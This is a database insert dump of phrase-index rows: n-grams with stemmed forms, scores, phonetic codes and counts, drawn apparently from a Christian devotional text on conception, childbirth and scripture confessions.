(216091, 'your child but', 'your child but', 0, 1, 1.4667, 'Y624313', 1, '*'),
(216092, 'your child is', 'your child is', 0, 1, 1.4333, 'Y62432', 1, '*'),
(216093, 'your child with', 'your child with', 0, 1, 1.5, 'Y6243', 1, '*'),
(216094, 'your children and', 'your children and', 0, 1, 1.5667, 'Y6243653', 1, '*'),
(216095, 'your children because', 'your children because', 0, 1, 1.7, 'Y62436512', 1, '*'),
(216096, 'your children from', 'your children from', 0, 1, 1.6, 'Y624365165', 1, '*'),
(216097, 'your children how', 'your children how', 0, 1, 1.5667, 'Y624365', 1, '*'),
(216098, 'your children if', 'your children if', 0, 1, 1.5333, 'Y6243651', 1, '*'),
(216099, 'your children is', 'your children is', 0, 1, 1.5333, 'Y6243652', 1, '*'),
(216100, 'your children may', 'your children may', 0, 1, 1.5667, 'Y624365', 1, '*'),
(216101, 'your children to', 'your children to', 0, 1, 1.5333, 'Y6243653', 1, '*'),
(216102, 'your children today', 'your children today', 0, 1, 1.6333, 'Y6243653', 1, '*'),
(216103, 'your children you', 'your children you', 0, 1, 1.5667, 'Y624365', 1, '*'),
(216104, 'your conception', 'your conception', 0, 1, 1.5, 'Y6252135', 1, '*'),
(216105, 'your conception delivery', 'your conception delivery', 0, 1, 1.8, 'Y62521353416', 1, '*'),
(216106, 'your family', 'your family', 0, 1, 1.3667, 'Y6154', 5, '*'),
(216107, 'your family lines', 'your family lines', 0, 1, 1.5667, 'Y615452', 1, '*'),
(216108, 'your lineage', 'your lineage', 0, 1, 1.4, 'Y6452', 1, '*'),
(216109, 'your lineage and', 'your lineage and', 0, 1, 1.5333, 'Y645253', 1, '*'),
(216110, 'your own child', 'your own child', 0, 1, 1.4667, 'Y65243', 1, '*'),
(216111, 'your results', 'your results', 0, 1, 1.4, 'Y62432', 1, '*'),
(216112, 'your results in', 'your results in', 0, 1, 1.5, 'Y624325', 1, '*'),
(216113, 'your work pray', 'your work pray', 0, 1, 1.4667, 'Y6216', 1, '*'),
(217114, 'believers are', 'believ are', 0, 1, 1.4333, 'B41626', 3, '*'),
(217138, 'bread', 'bread', 0, 0, 0.3333, 'B630', 2, '*'),
(217195, 'decisions', 'decis', 0, 0, 0.6, 'D252', 4, '*'),
(217203, 'determine how', 'determin how', 0, 1, 1.4333, 'D650', 3, '*'),
(217204, 'determine how the', 'determin how the', 0, 1, 1.5667, 'D653', 3, '*'),
(217223, 'emotional', 'emot', 0, 0, 0.6, 'E5354', 2, '*'),
(217268, 'first step', 'first step', 0, 1, 1.3333, 'F623231', 2, '*'),
(217339, 'how the', 'how the', 0, 1, 1.2333, 'H300', 3, '*'),
(217353, 'in the holy', 'in the holy', 0, 1, 1.3667, 'I534', 3, '*'),
(217354, 'in the spirit', 'in the spirit', 0, 1, 1.4333, 'I532163', 4, '*'),
(217434, 'make it', 'make it', 0, 1, 1.2333, 'M230', 3, '*'),
(217444, 'man has', 'man has', 0, 1, 1.2333, 'M200', 3, '*'),
(217456, 'man will', 'man will', 0, 1, 1.2667, 'M400', 4, '*'),
(217486, 'must be a', 'must be a', 0, 1, 1.3, 'M231', 2, '*'),
(217524, 'opened', 'open', 0, 0, 0.4, 'O153', 3, '*'),
(217538, 'over and', 'over and', 0, 1, 1.2667, 'O1653', 5, '*'),
(217547, 'perfect', 'perfect', 0, 0, 0.4667, 'P6123', 2, '*'),
(217564, 'praying in', 'prai in', 0, 1, 1.3333, 'P6525', 2, '*'),
(217565, 'praying in the', 'prai in the', 0, 1, 1.4667, 'P65253', 2, '*'),
(217599, 'rise', 'rise', 0, 0, 0.2667, 'R200', 2, '*'),
(217600, 'rise up', 'rise up', 0, 1, 1.2333, 'R210', 2, '*'),
(217657, 'spirit can', 'spirit can', 0, 1, 1.3333, 'S16325', 2, '*'),
(217668, 'spirit it', 'spirit it', 0, 1, 1.3, 'S163', 3, '*'),
(217787, 'that man', 'that man', 0, 1, 1.2667, 'T500', 3, '*'),
(217794, 'the first step', 'the first step', 0, 1, 1.4667, 'T1623231', 2, '*'),
(217844, 'through a', 'through a', 0, 1, 1.3, 'T620', 2, '*'),
(217870, 'to rise', 'to rise', 0, 1, 1.2333, 'T620', 2, '*'),
(217871, 'to rise up', 'to rise up', 0, 1, 1.3333, 'T621', 2, '*'),
(217893, 'up your spirit', 'up your spirit', 0, 1, 1.4667, 'U162163', 2, '*'),
(217900, 'was able', 'wa able', 0, 1, 1.2667, 'W214', 3, '*'),
(217901, 'was able to', 'wa able to', 0, 1, 1.3667, 'W2143', 3, '*'),
(217934, 'with god\'s', 'with god', 0, 1, 1.3333, 'W3232', 2, '*'),
(217997, 'your soul', 'your soul', 0, 1, 1.3, 'Y624', 4, '*'),
(220379, 'jesus\' name amen', 'jesu name amen', 0, 1, 1.5333, 'J500', 4, '*'),
(221026, '-”', '-”', 0, 0, 0.1333, '”000', 1, '*'),
(221027, '-” and', '-” and', 0, 1, 1.2, '”530', 1, '*'),
(221028, '-” and when', '-” and when', 0, 1, 1.3667, '”535', 1, '*'),
(221029, '..”', '..”', 0, 0, 0.2, '”000', 1, '*'),
(221030, '..” i', '..” i', 0, 1, 1.1667, '”000', 1, '*'),
(221031, '..” i come', '..” i come', 0, 1, 1.3333, '”250', 1, '*'),
(221032, '..” the', '..” the', 0, 1, 1.2333, '”300', 1, '*'),
(221033, '..” the fruit', '..” the fruit', 0, 1, 1.4333, '”3163', 1, '*'),
(221034, '.”', '.”', 0, 0, 0.1333, '”000', 4, '*'),
(221035, '.” gen', '.” gen', 0, 1, 1.2, '”250', 1, '*'),
(221036, '.” gen 4', '.” gen 4', 0, 1, 1.2667, '”250', 1, '*'),
(221037, '1 15 “but', '1 15 “but', 0, 1, 1.3, '“130', 1, '*'),
(221038, '1 19-”and', '1 19-”and', 0, 1, 1.3, '”530', 1, '*'),
(221039, '1 19-”and the', '1 19-”and the', 0, 1, 1.4333, '”530', 1, '*'),
(221040, '1 3', '1 3', 0, 1, 1.1, '', 1, '*'),
(221041, '1 3 “and', '1 3 “and', 0, 1, 1.2667, '“530', 1, '*'),
(221042, '1 44', '1 44', 0, 1, 1.1333, '', 1, '*'),
(221043, '1 44 “for', '1 44 “for', 0, 1, 1.3, '“160', 1, '*'),
(221044, '1 57', '1 57', 0, 1, 1.1333, '', 1, '*'),
(221045, '1 57 lk', '1 57 lk', 0, 1, 1.2333, 'L200', 1, '*'),
(221046, '1 8 “this', '1 8 “this', 0, 1, 1.3, '“320', 1, '*'),
(221047, '1 “and', '1 “and', 0, 1, 1.2, '“530', 1, '*'),
(221048, '1 “and adam', '1 “and adam', 0, 1, 1.3667, '“535', 1, '*'),
(221049, '11 “that', '11 “that', 0, 1, 1.2667, '“300', 1, '*'),
(221050, '11 “that ye', '11 “that ye', 0, 1, 1.3667, '“300', 1, '*'),
(221051, '113', '113', 0, 0, 0.3, '', 1, '*'),
(221052, '113 9', '113 9', 0, 1, 1.1667, '', 1, '*'),
(221053, '113 9 “he', '113 9 “he', 0, 1, 1.3, '“000', 1, '*'),
(221054, '11a-”and', '11a-”and', 0, 0, 0.5333, 'A530', 1, '*'),
(221055, '11a-”and the', '11a-”and the', 0, 1, 1.4, 'A530', 1, '*'),
(221056, '11a-”and the lord', '11a-”and the lord', 0, 1, 1.5667, 'A53463', 1, '*'),
(221057, '13 “christ', '13 “christ', 0, 1, 1.3333, '“2623', 1, '*'),
(221058, '13 “christ hath', '13 “christ hath', 0, 1, 1.5, '“2623', 1, '*'),
(221059, '13 “for', '13 “for', 0, 1, 1.2333, '“160', 1, '*'),
(221060, '13 “for thou', '13 “for thou', 0, 1, 1.4, '“163', 1, '*'),
(221061, '13-19', '13-19', 0, 0, 0.5, '', 1, '*'),
(221062, '13-19 13', '13-19 13', 0, 1, 1.2667, '', 1, '*'),
(221063, '13-19 13 “for', '13-19 13 “for', 0, 1, 1.4333, '“160', 1, '*'),
(221064, '139', '139', 0, 0, 0.3, '', 1, '*'),
(221065, '139 13-19', '139 13-19', 0, 1, 1.3, '', 1, '*'),
(221066, '139 13-19 13', '139 13-19 13', 0, 1, 1.4, '', 1, '*'),
(221067, '14 “i', '14 “i', 0, 1, 1.1667, '“000', 1, '*'),
(221068, '14 “i will', '14 “i will', 0, 1, 1.3333, '“400', 1, '*'),
(221069, '15 “but', '15 “but', 0, 1, 1.2333, '“130', 1, '*'),
(221070, '15 “but when', '15 “but when', 0, 1, 1.4, '“135', 1, '*'),
(221071, '15 “my', '15 “my', 0, 1, 1.2, '“500', 1, '*'),
(221072, '15 “my substance', '15 “my substance', 0, 1, 1.5333, '“5212352', 1, '*'),
(221073, '16 4', '16 4', 0, 1, 1.1333, '', 1, '*'),
(221074, '16 4 gen', '16 4 gen', 0, 1, 1.2667, 'G500', 1, '*'),
(221075, '16 “thine', '16 “thine', 0, 1, 1.3, '“350', 1, '*'),
(221076, '16 “thine eyes', '16 “thine eyes', 0, 1, 1.4667, '“352', 1, '*'),
(221077, '16 “unto', '16 “unto', 0, 1, 1.2667, '“530', 1, '*'),
(221078, '16 “unto the', '16 “unto the', 0, 1, 1.4, '“530', 1, '*'),
(221079, '17 gen', '17 gen', 0, 1, 1.2, 'G500', 1, '*'),
(221080, '17 gen 16', '17 gen 16', 0, 1, 1.3, 'G500', 1, '*'),
(221081, '17 “how', '17 “how', 0, 1, 1.2333, '“000', 1, '*'),
(221082, '17 “how precious', '17 “how precious', 0, 1, 1.5333, '“162', 1, '*'),
(221083, '17-”and', '17-”and', 0, 0, 0.4667, '”530', 1, '*'),
(221084, '17-”and it', '17-”and it', 0, 1, 1.3333, '”530', 1, '*'),
(221085, '17-”and it came', '17-”and it came', 0, 1, 1.5, '”5325', 1, '*'),
(221086, '17a', '17a', 0, 0, 0.2, 'A000', 1, '*'),
(221087, '17a “and', '17a “and', 0, 1, 1.2667, 'A530', 1, '*'),
(221088, '17a “and it', '17a “and it', 0, 1, 1.3667, 'A530', 1, '*'),
(221089, '18.“if', '18.“if', 0, 0, 0.4, '“100', 1, '*'),
(221090, '18.“if i', '18.“if i', 0, 1, 1.2667, '“100', 1, '*'),
(221091, '18.“if i should', '18.“if i should', 0, 1, 1.5, '“1243', 1, '*'),
(221092, '19-”and', '19-”and', 0, 0, 0.4667, '”530', 1, '*'),
(221093, '19-”and the', '19-”and the', 0, 1, 1.3667, '”530', 1, '*'),
(221094, '19-”and the midwives', '19-”and the midwives', 0, 1, 1.6667, '”535312', 1, '*'),
(221095, '19.“surely', '19.“sure', 0, 0, 0.6667, '“264', 1, '*'),
(221096, '19.“surely thou', '19.“sure thou', 0, 1, 1.5, '“2643', 1, '*'),
(221097, '19.“surely thou wilt', '19.“sure thou wilt', 0, 1, 1.6667, '“264343', 1, '*'),
(221098, '2 2b', '2 2b', 0, 1, 1.1333, 'B000', 1, '*'),
(221099, '2 2b -”', '2 2b -”', 0, 1, 1.2333, 'B000', 1, '*'),
(221100, '2 6.”', '2 6.”', 0, 1, 1.1667, '”000', 1, '*'),
(221101, '2 6.” i', '2 6.” i', 0, 1, 1.2333, '”000', 1, '*'),
(221102, '20 my', '20 my', 0, 1, 1.1667, 'M000', 1, '*'),
(221103, '20 my son', '20 my son', 0, 1, 1.3, 'M250', 1, '*'),
(221104, '20-22', '20-22', 0, 0, 0.5, '', 1, '*'),
(221105, '20-22 20', '20-22 20', 0, 1, 1.2667, '', 1, '*'),
(221106, '20-22 20 my', '20-22 20 my', 0, 1, 1.3667, 'M000', 1, '*'),
(221107, '21 let', '21 let', 0, 1, 1.2, 'L300', 1, '*'),
(221108, '21 let them', '21 let them', 0, 1, 1.3667, 'L350', 1, '*'),
(221109, '22 for they', '22 for they', 0, 1, 1.3667, 'F630', 1, '*'),
(221110, '23 26', '23 26', 0, 1, 1.1667, '', 1, '*'),
(221111, '23 26 “there', '23 26 “there', 0, 1, 1.4, '“360', 1, '*'),
(221112, '23 ex.2', '23 ex.2', 0, 1, 1.2333, 'E200', 1, '*'),
(221113, '23 ex.2 29', '23 ex.2 29', 0, 1, 1.3333, 'E200', 1, '*'),
(221114, '24 “and', '24 “and', 0, 1, 1.2333, '“530', 1, '*'),
(221115, '24 “and when', '24 “and when', 0, 1, 1.4, '“535', 1, '*'),
(221116, '25 24', '25 24', 0, 1, 1.1667, '', 1, '*'),
(221117, '25 24 “and', '25 24 “and', 0, 1, 1.3333, '“530', 1, '*'),
(221118, '26 “there', '26 “there', 0, 1, 1.3, '“360', 1, '*'),
(221119, '26 “there shall', '26 “there shall', 0, 1, 1.5, '“3624', 1, '*'),
(221120, '27b', '27b', 0, 0, 0.2, 'B000', 1, '*'),
(221121, '27b that', '27b that', 0, 1, 1.2667, 'B300', 1, '*'),
(221122, '27b that the', '27b that the', 0, 1, 1.4, 'B300', 1, '*'),
(221123, '28 4,11a', '28 4,11a', 0, 1, 1.2667, 'A000', 1, '*'),
(221124, '28 4,11a 4a', '28 4,11a 4a', 0, 1, 1.3667, 'A000', 1, '*'),
(221125, '29 32', '29 32', 0, 1, 1.1667, '', 1, '*'),
(221126, '29 32 33', '29 32 33', 0, 1, 1.2667, '', 1, '*'),
(221127, '29 i', '29 i', 0, 1, 1.1333, 'I000', 1, '*'),
(221128, '29 i am', '29 i am', 0, 1, 1.2333, 'I500', 1, '*'),
(221129, '29 i conceive', '29 i conceive', 0, 1, 1.4333, 'I2521', 1, '*'),
(221130, '2b', '2b', 0, 0, 0.1333, 'B000', 1, '*'),
(221131, '2b -”', '2b -”', 0, 1, 1.1667, 'B000', 1, '*'),
(221132, '2b -” and', '2b -” and', 0, 1, 1.3, 'B530', 1, '*'),
(221133, '3 13', '3 13', 0, 1, 1.1333, '', 1, '*'),
(221134, '3 13 “christ', '3 13 “christ', 0, 1, 1.4, '“2623', 1, '*'),
(221135, '3 16', '3 16', 0, 1, 1.1333, '', 1, '*'),
(221136, '3 16 “unto', '3 16 “unto', 0, 1, 1.3333, '“530', 1, '*'),
(221137, '3 29', '3 29', 0, 1, 1.1333, '', 1, '*'),
(221138, '3 29 i', '3 29 i', 0, 1, 1.2, 'I000', 1, '*'),
(221139, '3 times', '3 times', 0, 1, 1.2333, 'T520', 1, '*'),
(221140, '3 times daily', '3 times daily', 0, 1, 1.4333, 'T5234', 1, '*'),
(221141, '3 “and', '3 “and', 0, 1, 1.2, '“530', 1, '*'),
(221142, '3 “and he', '3 “and he', 0, 1, 1.3, '“530', 1, '*'),
(221143, '3 “i', '3 “i', 0, 1, 1.1333, '“000', 1, '*'),
(221144, '3 “i can', '3 “i can', 0, 1, 1.2667, '“250', 1, '*'),
(221145, '30 23', '30 23', 0, 1, 1.1667, '', 1, '*'),
(221146, '30 23 ex.2', '30 23 ex.2', 0, 1, 1.3333, 'E200', 1, '*'),
(221147, '30 5', '30 5', 0, 1, 1.1333, '', 1, '*'),
(221148, '30 5 7', '30 5 7', 0, 1, 1.2, '', 1, '*'),
(221149, '32 33', '32 33', 0, 1, 1.1667, '', 1, '*'),
(221150, '32 33 34', '32 33 34', 0, 1, 1.2667, '', 1, '*'),
(221151, '33 34', '33 34', 0, 1, 1.1667, '', 1, '*'),
(221152, '33 34 35', '33 34 35', 0, 1, 1.2667, '', 1, '*'),
(221153, '34 35', '34 35', 0, 1, 1.1667, '', 1, '*'),
(221154, '34 35 gen', '34 35 gen', 0, 1, 1.3, 'G500', 1, '*'),
(221155, '35 17-”and', '35 17-”and', 0, 1, 1.3333, '”530', 1, '*'),
(221156, '35 17-”and it', '35 17-”and it', 0, 1, 1.4333, '”530', 1, '*'),
(221157, '35 17a', '35 17a', 0, 1, 1.2, 'A000', 1, '*'),
(221158, '35 17a “and', '35 17a “and', 0, 1, 1.3667, 'A530', 1, '*'),
(221159, '35 27b', '35 27b', 0, 1, 1.2, 'B000', 1, '*'),
(221160, '35 27b that', '35 27b that', 0, 1, 1.3667, 'B300', 1, '*'),
(221161, '35 gen', '35 gen', 0, 1, 1.2, 'G500', 1, '*'),
(221162, '35 gen 30', '35 gen 30', 0, 1, 1.3, 'G500', 1, '*'),
(221163, '36', '36', 0, 0, 0.2, '', 1, '*'),
(221164, '36 scriptural', '36 scriptural', 0, 1, 1.4333, 'S61364', 1, '*'),
(221165, '36 scriptural confession', '36 scriptural confession', 0, 1, 1.8, 'S6136425125', 1, '*'),
(221166, '4 1 “and', '4 1 “and', 0, 1, 1.2667, '“530', 1, '*'),
(221167, '4 17 gen', '4 17 gen', 0, 1, 1.2667, 'G500', 1, '*'),
(221168, '4 20-22', '4 20-22', 0, 1, 1.2333, '', 1, '*'),
(221169, '4 20-22 20', '4 20-22 20', 0, 1, 1.3333, '', 1, '*'),
(221170, '4 3', '4 3', 0, 1, 1.1, '', 1, '*'),
(221171, '4 3 “i', '4 3 “i', 0, 1, 1.2, '“000', 1, '*'),
(221172, '4 gen', '4 gen', 0, 1, 1.1667, 'G500', 1, '*'),
(221173, '4 gen 29', '4 gen 29', 0, 1, 1.2667, 'G500', 1, '*'),
(221174, '4,11a', '4,11a', 0, 0, 0.3333, 'A000', 1, '*'),
(221175, '4,11a 4a', '4,11a 4a', 0, 1, 1.2667, 'A000', 1, '*'),
(221176, '4,11a 4a “blessed', '4,11a 4a “blessed', 0, 1, 1.5667, 'A1423', 1, '*'),
(221177, '44 “for', '44 “for', 0, 1, 1.2333, '“160', 1, '*'),
(221178, '44 “for lo', '44 “for lo', 0, 1, 1.3333, '“164', 1, '*'),
(221179, '4a', '4a', 0, 0, 0.1333, 'A000', 1, '*'),
(221180, '4a “blessed', '4a “blessed', 0, 1, 1.3667, 'A1423', 1, '*'),
(221181, '4a “blessed shall', '4a “blessed shall', 0, 1, 1.5667, 'A142324', 1, '*'),
(221182, '5 7', '5 7', 0, 1, 1.1, '', 1, '*'),
(221183, '5 7 gen', '5 7 gen', 0, 1, 1.2333, 'G500', 1, '*'),
(221184, '57', '57', 0, 0, 0.2, '', 2, '*'),
(221185, '57 lk', '57 lk', 0, 1, 1.1667, 'L200', 1, '*'),
(221186, '57 lk 2', '57 lk 2', 0, 1, 1.2333, 'L200', 1, '*'),
(221187, '58', '58', 0, 0, 0.2, '', 2, '*'),
(221188, '58 8', '58 8', 0, 1, 1.1333, '', 1, '*'),
(221189, '58 8 “then', '58 8 “then', 0, 1, 1.3333, '“350', 1, '*'),
(221190, '6.”', '6.”', 0, 0, 0.2, '”000', 1, '*'),
(221191, '6.” i', '6.” i', 0, 1, 1.1667, '”000', 1, '*'),
(221192, '6.” i will', '6.” i will', 0, 1, 1.3333, '”400', 1, '*'),
(221193, '66', '66', 0, 0, 0.2, '', 1, '*'),
(221194, '66 11', '66 11', 0, 1, 1.1667, '', 1, '*'),
(221195, '66 11 “that', '66 11 “that', 0, 1, 1.3667, '“300', 1, '*'),
(221196, '66 7', '66 7', 0, 1, 1.1333, '', 1, '*'),
(221197, '66 7 “before', '66 7 “before', 0, 1, 1.4, '“160', 1, '*'),
(221198, '66 8', '66 8', 0, 1, 1.1333, '', 1, '*'),
(221199, '66 8 “who', '66 8 “who', 0, 1, 1.3, '“000', 1, '*'),
(221200, '66 9', '66 9', 0, 1, 1.1333, '', 1, '*'),
(221201, '66 9 “shall', '66 9 “shall', 0, 1, 1.3667, '“240', 1, '*'),
(221202, '7 gen', '7 gen', 0, 1, 1.1667, 'G500', 1, '*'),
(221203, '7 gen 30', '7 gen 30', 0, 1, 1.2667, 'G500', 1, '*'),
(221204, '7 “before', '7 “before', 0, 1, 1.3, '“160', 1, '*'),
(221205, '7 “before she', '7 “before she', 0, 1, 1.4333, '“162', 1, '*'),
(221206, '8 “then', '8 “then', 0, 1, 1.2333, '“350', 1, '*'),
(221207, '8 “then shall', '8 “then shall', 0, 1, 1.4333, '“3524', 1, '*'),
(221208, '8 “this', '8 “this', 0, 1, 1.2333, '“320', 1, '*'),
(221209, '8 “this book', '8 “this book', 0, 1, 1.4, '“3212', 1, '*'),
(221210, '8 “who', '8 “who', 0, 1, 1.2, '“000', 1, '*'),
(221211, '8 “who hath', '8 “who hath', 0, 1, 1.3667, '“300', 1, '*'),
(221212, '9 “he', '9 “he', 0, 1, 1.1667, '“000', 1, '*'),
(221213, '9 “he maketh', '9 “he maketh', 0, 1, 1.4, '“523', 1, '*'),
(221214, '9 “shall', '9 “shall', 0, 1, 1.2667, '“240', 1, '*'),
(221215, '9 “shall i', '9 “shall i', 0, 1, 1.3333, '“240', 1, '*'),
(221216, 'a curse', 'a curse', 0, 1, 1.2333, 'A262', 2, '*'),
(221217, 'a curse for', 'a curse for', 0, 1, 1.3667, 'A26216', 1, '*'),
(221218, 'a goodly', 'a goodly', 0, 1, 1.2667, 'A234', 1, '*'),
(221219, 'a goodly child', 'a goodly child', 0, 1, 1.4667, 'A234243', 1, '*'),
(221220, 'a hebrew', 'a hebrew', 0, 1, 1.2667, 'A160', 1, '*'),
(221221, 'a hebrew woman', 'a hebrew woman', 0, 1, 1.4667, 'A165', 1, '*'),
(221222, 'a joyful', 'a joyful', 0, 1, 1.2667, 'A214', 1, '*'),
(221223, 'a joyful mother', 'a joyful mother', 0, 1, 1.5, 'A214536', 1, '*'),
(221224, 'a man child', 'a man child', 0, 1, 1.3667, 'A5243', 1, '*'),
(221225, 'a man from', 'a man from', 0, 1, 1.3333, 'A5165', 1, '*'),
(221226, 'a nation', 'a nation', 0, 1, 1.2667, 'A535', 1, '*'),
(221227, 'a nation be', 'a nation be', 0, 1, 1.3667, 'A5351', 1, '*'),
(221228, 'a neat', 'a neat', 0, 1, 1.2, 'A530', 1, '*'),
(221229, 'a neat job', 'a neat job', 0, 1, 1.3333, 'A5321', 1, '*'),
(221230, 'a thing who', 'a thing who', 0, 1, 1.3667, 'A352', 1, '*'),
(221231, 'a tree', 'a tree', 0, 1, 1.2, 'A360', 1, '*'),
(221232, 'a tree christ', 'a tree christ', 0, 1, 1.4333, 'A362623', 1, '*'),
(221233, 'a tree planted', 'a tree planted', 0, 1, 1.4667, 'A361453', 1, '*'),
(221234, 'abundance of', 'abund of', 0, 1, 1.4, 'A153521', 1, '*'),
(221235, 'abundance of her', 'abund of her', 0, 1, 1.5333, 'A1535216', 1, '*'),
(221236, 'accomplished psalm', 'accomplish psalm', 0, 1, 1.6, 'A2514231245', 1, '*'),
(221237, 'accomplished psalm 1', 'accomplish psalm 1', 0, 1, 1.6667, 'A2514231245', 1, '*'),
(221238, 'according to all', 'accord to all', 0, 1, 1.5333, 'A2635234', 1, '*'),
(221239, 'active and', 'activ and', 0, 1, 1.3333, 'A23153', 1, '*'),
(221240, 'active and also', 'activ and also', 0, 1, 1.5, 'A2315342', 1, '*'),
(221241, 'adam knew', 'adam knew', 0, 1, 1.3, 'A3525', 1, '*'),
(221242, 'adam knew eve', 'adam knew eve', 0, 1, 1.4333, 'A35251', 1, '*'),
(221243, 'after delivery', 'after delivery', 0, 1, 1.4667, 'A1363416', 1, '*'),
(221244, 'after delivery they', 'after delivery they', 0, 1, 1.6333, 'A13634163', 1, '*'),
(221245, 'afternoon', 'afternoon', 0, 0, 0.6, 'A1365', 1, '*'),
(221246, 'afternoon and', 'afternoon and', 0, 1, 1.4333, 'A13653', 1, '*'),
(221247, 'afternoon and evening', 'afternoon and evening', 0, 1, 1.7, 'A13653152', 1, '*'),
(221248, 'against all', 'against all', 0, 1, 1.3667, 'A25234', 1, '*'),
(221249, 'against all odds', 'against all odds', 0, 1, 1.5333, 'A2523432', 1, '*'),
(221250, 'against every', 'against every', 0, 1, 1.4333, 'A252316', 1, '*'),
(221251, 'against every hard', 'against every hard', 0, 1, 1.6, 'A2523163', 1, '*'),
(221252, 'alive and well', 'aliv and well', 0, 1, 1.4667, 'A41534', 1, '*'),
(221253, 'all my members', 'all my members', 0, 1, 1.4667, 'A45162', 1, '*'),
(221254, 'all odds', 'all odds', 0, 1, 1.2667, 'A432', 1, '*'),
(221255, 'all odds my', 'all odds my', 0, 1, 1.3667, 'A4325', 1, '*'),
(221256, 'all that is', 'all that is', 0, 1, 1.3667, 'A432', 1, '*'),
(221257, 'all their', 'all their', 0, 1, 1.3, 'A436', 2, '*'),
(221258, 'all their flesh', 'all their flesh', 0, 1, 1.5, 'A436142', 1, '*'),
(221259, 'all things through', 'all things through', 0, 1, 1.6, 'A4352362', 1, '*'),
(221260, 'also are', 'also are', 0, 1, 1.2667, 'A426', 1, '*'),
(221261, 'also are thy', 'also are thy', 0, 1, 1.4, 'A4263', 1, '*'),
(221262, 'also filled', 'also filled', 0, 1, 1.3667, 'A42143', 1, '*'),
(221263, 'also filled with', 'also filled with', 0, 1, 1.5333, 'A42143', 1, '*'),
(221264, 'also no', 'also no', 0, 1, 1.2333, 'A425', 1, '*'),
(221265, 'also no still', 'also no still', 0, 1, 1.4333, 'A425234', 1, '*'),
(221266, 'also shall', 'also shall', 0, 1, 1.3333, 'A424', 1, '*'),
(221267, 'also shall not', 'also shall not', 0, 1, 1.4667, 'A42453', 1, '*'),
(221268, 'also.”', 'also.”', 0, 0, 0.4, 'A420', 1, '*'),
(221269, 'also.” i', 'also.” i', 0, 1, 1.2667, 'A420', 1, '*'),
(221270, 'also.” i fear', 'also.” i fear', 0, 1, 1.4333, 'A4216', 1, '*'),
(221271, 'also.” i receive', 'also.” i receive', 0, 1, 1.5333, 'A42621', 1, '*'),
(221272, 'am a', 'am a', 0, 1, 1.1333, 'A500', 2, '*'),
(221273, 'am a hebrew', 'am a hebrew', 0, 1, 1.3667, 'A516', 1, '*'),
(221274, 'am alive', 'am alive', 0, 1, 1.2667, 'A541', 1, '*'),
(221275, 'am alive and', 'am alive and', 0, 1, 1.4, 'A54153', 1, '*'),
(221276, 'am fearfully', 'am fearfully', 0, 1, 1.4, 'A51614', 1, '*'),
(221277, 'am fearfully and', 'am fearfully and', 0, 1, 1.5333, 'A5161453', 1, '*'),
(221278, 'am healthy', 'am healthy', 0, 1, 1.3333, 'A543', 1, '*'),
(221279, 'am healthy and', 'am healthy and', 0, 1, 1.4667, 'A54353', 1, '*'),
(221280, 'am joyful', 'am joyful', 0, 1, 1.3, 'A5214', 1, '*'),
(221281, 'am joyful mother', 'am joyful mother', 0, 1, 1.5333, 'A5214536', 1, '*'),
(221282, 'am lively', 'am lively', 0, 1, 1.3, 'A5414', 1, '*'),
(221283, 'am lively i', 'am lively i', 0, 1, 1.3667, 'A5414', 1, '*'),
(221284, 'am not', 'am not', 0, 1, 1.2, 'A530', 1, '*'),
(221285, 'am not an', 'am not an', 0, 1, 1.3, 'A535', 1, '*'),
(221286, 'am not sick', 'am not sick', 0, 1, 1.3667, 'A532', 1, '*'),
(221287, 'am not weak', 'am not weak', 0, 1, 1.3667, 'A532', 1, '*'),
(221288, 'am redeemed', 'am redeemed', 0, 1, 1.3667, 'A56353', 1, '*'),
(221289, 'am redeemed from', 'am redeemed from', 0, 1, 1.5333, 'A56353165', 1, '*'),
(221290, 'am still', 'am still', 0, 1, 1.2667, 'A5234', 1, '*'),
(221291, 'am still with', 'am still with', 0, 1, 1.4333, 'A52343', 1, '*'),
(221292, 'am strengthened', 'am strengthened', 0, 1, 1.5, 'A523652353', 1, '*'),
(221293, 'am strengthened both', 'am strengthened both', 0, 1, 1.6667, 'A52365235313', 1, '*'),
(221294, 'an unbeliever without', 'an unbeliever without', 0, 1, 1.7, 'A514163', 1, '*'),
(221295, 'and after', 'and after', 0, 1, 1.3, 'A53136', 1, '*'),
(221296, 'and after delivery', 'and after delivery', 0, 1, 1.6, 'A531363416', 1, '*'),
(221297, 'and also filled', 'and also filled', 0, 1, 1.5, 'A5342143', 1, '*'),
(221298, 'and are', 'and are', 0, 1, 1.2333, 'A536', 3, '*'),
(221299, 'and are delivered', 'and are delivered', 0, 1, 1.5667, 'A53634163', 1, '*'),
(221300, 'and bare', 'and bare', 0, 1, 1.2667, 'A5316', 1, '*'),
(221301, 'and bare so', 'and bare so', 0, 1, 1.3667, 'A53162', 1, '*'),
(221302, 'and be delighted', 'and be delighted', 0, 1, 1.5333, 'A5313423', 1, '*'),
(221303, 'and be satisfied', 'and be satisfied', 0, 1, 1.5333, 'A53123213', 1, '*'),
(221304, 'and bears', 'and bears', 0, 1, 1.3, 'A53162', 1, '*'),
(221305, 'and bears cain', 'and bears cain', 0, 1, 1.4667, 'A531625', 1, '*'),
(221306, 'and being', 'and being', 0, 1, 1.3, 'A53152', 1, '*'),
(221307, 'and being pale', 'and being pale', 0, 1, 1.4667, 'A5315214', 1, '*'),
(221308, 'and called me', 'and called me', 0, 1, 1.4333, 'A532435', 1, '*'),
(221309, 'and childbirth', 'and childbirth', 0, 1, 1.4667, 'A53243163', 1, '*'),
(221310, 'and childbirth i', 'and childbirth i', 0, 1, 1.5333, 'A53243163', 1, '*'),
(221311, 'and curiously', 'and curiously', 0, 1, 1.4333, 'A532624', 1, '*'),
(221312, 'and curiously wrought', 'and curiously wrought', 0, 1, 1.7, 'A532624623', 1, '*'),
(221313, 'and delivery', 'and delivery', 0, 1, 1.4, 'A53416', 1, '*'),
(221314, 'and delivery and', 'and delivery and', 0, 1, 1.5333, 'A5341653', 1, '*'),
(221315, 'and evening', 'and evening', 0, 1, 1.3667, 'A53152', 1, '*'),
(221316, 'and evening it', 'and evening it', 0, 1, 1.4667, 'A531523', 1, '*'),
(221317, 'and everyone that', 'and everyone that', 0, 1, 1.5667, 'A531653', 1, '*'),
(221318, 'and great purpose', 'and great purpose', 0, 1, 1.5667, 'A532631612', 1, '*'),
(221319, 'and health', 'and health', 0, 1, 1.3333, 'A5343', 1, '*'),
(221320, 'and health to', 'and health to', 0, 1, 1.4333, 'A5343', 1, '*'),
(221321, 'and i bare', 'and i bare', 0, 1, 1.3333, 'A5316', 1, '*'),
(221322, 'and i bring', 'and i bring', 0, 1, 1.3667, 'A531652', 1, '*'),
(221323, 'and night', 'and night', 0, 1, 1.3, 'A53523', 1, '*'),
